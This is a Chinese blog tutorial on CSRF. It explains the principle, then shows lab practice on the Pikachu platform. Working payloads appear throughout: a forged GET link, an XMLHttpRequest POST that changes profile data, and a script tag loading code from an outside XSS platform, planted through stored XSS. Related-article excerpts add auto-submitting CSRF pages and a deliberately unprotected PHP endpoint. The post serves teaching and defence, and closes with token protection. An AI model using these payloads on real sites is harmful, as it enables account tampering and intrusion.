CSRF(跨站请求伪造)原理与实践

最新推荐文章于 2024-11-09 16:43:14 发布
最新推荐文章于 2024-11-09 16:43:14 发布
阅读量538 收藏 3
点赞数 2
分类专栏: 渗透 文章标签: CSRF 跨站请求伪造 原理与实践
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44632668/article/details/98514298
版权

CSRF原理与实践

一、原理

Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也称为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。

这里列举一个场景解释一下,希望能够帮助你理解。
场景需求:
小黑想要修改大白在购物网站www.xx.com上填写的会员地址。
先看下大白是如何修改自己的密码的:
登录—修改会员信息,提交请求—修改成功。
所以小黑想要修改大白的信息,他需要拥有:1、登录权限 2、修改个人信息的请求。
但是大白又不会把自己xxx网站的账号密码告诉小黑,那小黑怎么办?
于是他自己跑到www.xx.com上注册了一个自己的账号,然后修改了一下自己的个人信息(比如:E-mail地址),他发现修改的请求是:
http://www.xxx.com/edit.php?email=xiaohei@88.com&Change=Change】
于是,他实施了这样一个操作:把这个链接伪装一下,在小白登录xxx网站后,欺骗他进行点击,小白点击这个链接后,个人信息就被修改了,小黑就完成了攻击目的。
为啥小黑的操作能够实现呢。有如下几个关键点:

  1. www.xxx.com这个网站在用户修改个人的信息时没有过多的校验,导致这个请求容易被伪造;

因此,我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。

  1. 小白点击了小黑发给的链接,并且这个时候小白刚好登录在购物网上;

如果小白安全意识高,不点击不明链接,则攻击不会成功,又或者即使小白点击了链接,但小白此时并没有登录购物网站,也不会成功。
因此,要成功实施一次CSRF攻击,需要“天时,地利,人和”的条件。

当然,如果小黑事先在xxx网的首页如果发现了一个XSS漏洞,则小黑可能会这样做: 欺骗小白访问埋伏了XSS脚本(盗取cookie的脚本)的页面,小白中招,小黑拿到小白的cookie,然后小黑顺利登录到小白的后台,小黑自己修改小白的相关信息。
—所以跟上面比一下,就可以看出CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,可以说是借刀杀人,而XSS是直接盗取到了用户的权限,然后实施破坏。
因此,网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。
比如:

  • 对敏感信息的操作增加安全的token;
  • 对敏感信息的操作增加安全的验证码;
  • 对敏感信息的操作实施安全的逻辑流程,比如修改密码时,需要先校验旧密码等。

如果你没有读太明白,不要犹豫,请再读一遍啦

二、实践

2.1 CSRF (get)与(post)

我用Pikachu漏洞练习平台来实践一下,首先登陆
在这里插入图片描述点击修改个人信息,打开burpsuite准备抓包,点击submit
在这里插入图片描述成功抓包,右击相关工具,CSRF PoC生成
在这里插入图片描述修改相关资料,我这里修改电话为123123,点击用浏览器测试,点击复制,当然,你可以伪造一个URL,诱导被攻击者点击即成功。
在这里插入图片描述在浏览器打开即成功修改手机号
在这里插入图片描述

2.2 CSRF结合XSS

现在CSRF利用基本上都是配合XSS进行,这样可以降低攻击成本,扩大危害
首先用burpsuite抓取修改资料的数据包
在这里插入图片描述基本就是这个格式,把数据和网址修改即可

var xmlhttp;
if (window.XMLHttpRequest)
{xmlhttp=new XMLHttpRequest(); }
else
{xmlhttp=new ActiveXObject ("Microsoft.XMLHTTP"); }
xmlhttp.open("POST","http://192.168.130.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php",true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("sex=boy&phonenum=123123&add=usa&email=grady%40pikachu.com&submit=submit") ;

在这里插入图片描述
找到存储XSS的留言板,放入下面的XSS平台代码

将如下代码植入怀疑出现xss的地方(注意'的转义),即可在 项目内容 观看XSS效果。

<script src=https://xsspt.com/qo87m7></script>

在这里插入图片描述
submit,查看网络请求可以发现代码已经生效了,响应码200
在这里插入图片描述
资料也被修改
在这里插入图片描述

2.3 Token防止CSRF

点击修改个人信息按钮后,服务器会返回一个个人信息的表单页面。表单会嵌入一个隐藏的标签,标签的value属性值为服务器端生成并存储在Session中的token,表单数据被提交时,token也会被提交到服务器。
在这里插入图片描述
当填好个人信息的表单,点击提交后,服务器不仅检查信息是否有空值,还会将表单提交过来的token值也Session中的token值作对比,对比不通过不会执行个人信息修改操作。在这里插入图片描述

V
关注
专栏目录
CSRF跨站请求伪造——原理及复现
qq_41679358的博客
08-11 3392
转自行云博客https://www.xy586.top/ 原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了.
跨站请求伪造CSRF)攻击:原理、案例分析防御策略
m0_61532714的博客
06-12 2941
多层次的综合防御策略,包括使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie,是防范CSRF攻击的关键。CSRF攻击的核心在于利用用户已经登录的身份,向目标网站发送恶意请求。攻击者通过构造恶意的GET请求,诱使用户点击链接或访问恶意网站,从而在用户不知情的情况下执行恶意操作。攻击者通过构造恶意的表单提交,诱使用户点击按钮或自动提交表单,从而在用户不知情的情况下执行恶意操作。在每个敏感操作的表单或请求中包含一个的CSRF令牌,服务器在接收到请求时验证该令牌,请求的合法性。
跨站请求伪造CSRF,Cross-Site Request Forgery)
坚定目标,超越自我
10-10 2626
由于跨站请求通常无法携带自定义头信息,因此检查请求中是否包含自定义头可以作为一种防御手段。使用自定义请求头是一种防御跨站请求伪造CSRF)攻击的技术。这种方法的基本思想是在客户端的请求中添加一个自定义的HTTP头部(Header),服务器端检查这个头部以验证请求的合法性。由于跨站请求通常无法设置自定义头部,这为服务器提供了一种简单的验证机制。
CSRF跨站请求伪造原理
W_seventeen的博客
02-24 425
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“one click attack”或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。CSRF通过伪装来自受信任用户的请求来利用受信任的网站。XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。 下图是一次...
CSRF跨站请求伪造
18年3月萌新白帽子
06-19 570
CSRF介绍:CSRF中文名称:跨站请求伪造,是一种“挟持用户”在当前已登陆的Web应用程序上执行“非本意操作”的攻击方法。一、CSRF回放攻击流程套用老师所给的一张攻击原理图从这张流程图里我们总结一下CSRF攻击生效所需要的两个必要条件1.被攻击者成功登陆信任站点A,并在本地生成cookie2.用户使用同一浏览器在不退出的情况下,访问带有CSRF代码的网站B二、原理介绍首先说明一点,我们并没有挟...
CSRF跨站请求伪造CSRF PHP demo代码
05-04
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种网络攻击方式,攻击者通过诱导用户在已登录的网站上执行非预期的操作。在这个PHP demo中,我们将深入理解CSRF攻击的原理,并探讨如何防范。 首先,让我们看...
网络安全:(二十五)前端跨站请求伪造CSRF)和跨域访问安全策略
mmc123125的博客
11-09 1103
跨站请求伪造(Cross-Site Request Forgery,简称 CSRF)是一种攻击方式,攻击者诱导已登录的用户在不知情的情况下向受信任的 Web 应用发送恶意请求。由于用户的身份认证信息(如 Cookie)会自动随请求发送,因此恶意请求会被认为是用户发起的,攻击者借此可以执行未经授权的操作,如转账、修改账户信息等。
【安全牛学习笔记】CSRF跨站请求伪造攻击漏洞的原理及解决办法
edu_aqniu的博客
10-23 1059
CSRF跨站请求伪造攻击漏洞的原理及解决办法 CSRF,夸张请求伪造漏洞 漏洞的原理及修复方法 1.常见的触发场景 2.漏洞原理:浏览器同源策略 3.DEMO 4.漏洞危害 5.如何避免&修复漏洞 WEB clinet server HTTP GET POST csrf漏洞 漏洞原理: Server端接受到用户请求的时候
CSRF跨站请求伪造攻击及防范
CSRF(Cross-Site Request Forgery)跨站请求伪造攻击是一种常见的网络安全漏洞,也被称为“海报攻击”或“一次性攻击”。攻击者利用用户已经登录过的网站的 Cookie 信息,诱导用户访问恶意网站,通过携带伪造请求...
csrf跨站请求伪造简单示例
10-18
一个简单的csrf跨站请求伪造的示例,只有一个简单的表单提交功能.通过伪造表单提交,完成一个简单的钓鱼案例
CSRF(跨站请求伪造)详解
Y22Lee的博客
04-10 1999
CSRF全称Cross-Site Request Forgery,也被称为 one-click attack 或者 session riding,即跨站请求伪造攻击。当发现网站存在CSRF漏洞时,攻击者会利用网站源码,构建一个存有恶意请求的网站或者是链接,引诱受害者访问,那么当受害者在访问攻击者伪造的网站,同时,又在访问攻击者攻击的目标网站且没有关闭会话,那么攻击者就成功完成了CSRF攻击!攻击者可以发送请求包,比如:修改邮箱的,上传文件的等等。
CSRF 跨站请求伪造
m0_69043895的博客
04-19 1263
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(),但它XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比更具危险性。
CSRF跨站请求伪造)
qq_42176207的博客
05-06 256
CSRF跨站请求伪造CSRF,即跨站请求伪造(Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 LOW CSRF Source vulnerabilities/csrf/source/low.p
CSRF(跨站请求伪造)
总有人间一两风,填我十万八千梦
01-12 3570
目录 CSRF 原理过程 概述 关键点 通过银行转账实验理解CSRF 防御 CSRF (Cross-Site Request Forgery) CSRF是一种欺骗受害者提交恶意请求的攻击,攻击者盗用你的身份,向服务器发送请求 原理过程 小明用浏览器访问受信任网站A,并输入用户名及密码进行登录; 小明的用户信息验证通过后,网站A会返回一个cookie信息给浏览器。 小明没有退出浏览器前,用同一浏览器访问了假网站B B站收到请求后返回攻击性代码,要求访问..
跨站请求伪造CSRF实验
最新发布
04-03
### 关于跨站请求伪造CSRF)实验的设计实施 #### 实验目标 通过设计并执行一个简单的 CSRF 攻击场景,验证攻击的工作原理以及其可能带来的危害。这有助于理解 CSRF 的本质及其防御方法。 --- #### 实验环境准备 1. **本地开发服务器** 使用 Web 开发框架搭建一个支持用户登录功能的小型应用,例如 PHP 或 Python Flask 应用程序。该应用程序应允许修改用户的某些敏感数据(如密码),以便模拟真实世界中的业务逻辑。 2. **易受攻击的功能模块** 创建一个未加防护的 URL 接口用于更新用户密码或其他操作。例如: ```php <?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'GET') { $new_password = $_GET['password_new']; $confirm_password = $_GET['password_conf']; if ($new_password && $confirm_password && $new_password === $confirm_password) { echo "Password updated successfully!"; // Simulate password update logic here. } else { echo "Error updating password."; } } ?> ``` 3. **恶意页面构建** 构建一个 HTML 页面,其中包含能够触发 CSRF 攻击的内容。此页面可以通过诱导受害者访问来完成攻击过程。 --- #### 实现步骤 ##### 方法一:基于 GET 请求CSRF 测试 创建一个 HTML 文件,在文件中嵌入超链接或自动加载脚本以发起 CSRF 请求: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Test</title> </head> <body> <!-- 隐蔽的超链接 --> <a href="http://localhost/csrf_vulnerable_app/change_password.php?password_new=hacked&password_conf=hacked" style="display:none;" id="csrf-link"></a> <!-- 自动点击链接 --> <script> document.getElementById('csrf-link').click(); </script> </body> </html> ``` 上述代码会在用户打开页面时立即发送一个 GET 请求到指定的目标地址[^4]。 ##### 方法二:基于 POST 请求CSRF 测试 如果目标接口仅接受 POST 请求,则可通过 `<form>` 表单提交方式实现 CSRF 攻击: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CSRF Form Attack</title> </head> <body onload="document.forms[0].submit()"> <form action="http://localhost/csrf_vulnerable_app/update_user.php" method="POST"> <input type="hidden" name="act" value="add"/> <input type="hidden" name="username" value="attacker"/> <input type="hidden" name="password" value="hackedpass"/> <input type="hidden" name="password2" value="hackedpass"/> <input type="hidden" name="button" value="%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"/> <input type="hidden" name="userid" value="0"/> </form> </body> </html> ``` 当受害者浏览这个恶意页面时,浏览器会自动向目标站点提交表单数据[^3]。 --- #### 安全测试注意事项 在实际环境中进行此类测试前需获得授权,以免触犯法律。此外,建议使用虚拟机隔离测试网络,防止意外影响其他系统资源。 --- #### 防御措施概述 为了有效抵御 CSRF 攻击,可采取以下策略之一或多组合使用: - 添加一次性令牌(Token)校验机制; - 设置严格的 Referer 和 Origin 头部检查; - 启用 SameSite Cookie 属性限制第三方调用行为[^1]。 --- ### 结论 通过对 CSRF 漏洞的学习和实践,可以更深刻认识到这类威胁的存在形式及潜在风险,并掌握相应的缓解手段。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值